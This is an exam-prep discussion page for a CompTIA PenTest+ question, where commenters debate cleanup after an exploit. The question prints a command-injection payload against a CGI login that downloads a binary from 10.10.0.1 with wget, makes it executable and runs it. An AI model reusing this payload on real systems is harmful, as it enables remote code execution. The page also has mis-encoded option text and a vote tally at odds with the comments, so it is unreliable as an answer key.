ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT1-002 All Questions

View all questions & answers for the PT1-002 exam
Go to Exam

Exam PT1-002 topic 1 question 25 discussion

Actual exam question from CompTIA's PT1-002
Question #: 25
Topic #: 1
[All PT1-002 Questions]

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%
27&loginUser=a&Pwd=a`
exploit += `HTTP/1.1`
Which of the following commands should the penetration tester run post-engagement?

  • A. grep ג€"v apache ~/.bash_history > ~/.bash_history
  • B. rm ג€"rf /tmp/apache
  • C. chmod 600 /tmp/apache
  • D. taskkill /IM ג€apacheג€ /F
Show Suggested Answer Hide Answer
Suggested Answer: B 🗳️
by DohJayVeh at Sept. 30, 2021, 2:12 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
BinarySoldier
Highly Voted 3 years, 5 months ago
The apache folder in tmp was added by the tester, therefore, it's right for him to clean it up. B is the right answer.
upvoted 9 times
...
bieecop
Most Recent 1 year, 10 months ago
Selected Answer: B
The command rm -rf /tmp/apache is used to remove the file named "apache" located in the "/tmp" directory. This command ensures the removal of the potentially malicious file that was downloaded to the system during the exploitation process. By removing the file, the tester helps eliminate any potential lingering artifacts or backdoors left on the system.
upvoted 2 times
...
kenechi
2 years, 2 months ago
Selected Answer: B
The apache file was downloaded using the wget and the permission was changed to 777 for all to execute the file. It was executed using the ./apache after it was made executable. It is proper to remove the executable in the /tmp directory.
upvoted 3 times
...
TheITStudent
2 years, 9 months ago
Selected Answer: C
All i know, is mkdir is the standard command for creating a directory folder, and i DO NOT SEE that here, so we don't have any indication that this folder was created, only that its permissions were changed from 600 to 777... I think post assesment cleanup should involve reseting the configurations to how you found them.
upvoted 3 times
...
rootlikegroot
2 years, 10 months ago
The most important thing before deleting the /tmp/apache directory is to change the permissions from 777 to 600.
upvoted 1 times
isaphiltrick
1 year, 8 months ago
I don't understand this logic--why would you need to change the permissions if you were going to delete it anyway? Answer is B, just delete it.
upvoted 1 times
...
...
DohJayVeh
3 years, 7 months ago
This force deletes everything in that folder
upvoted 1 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago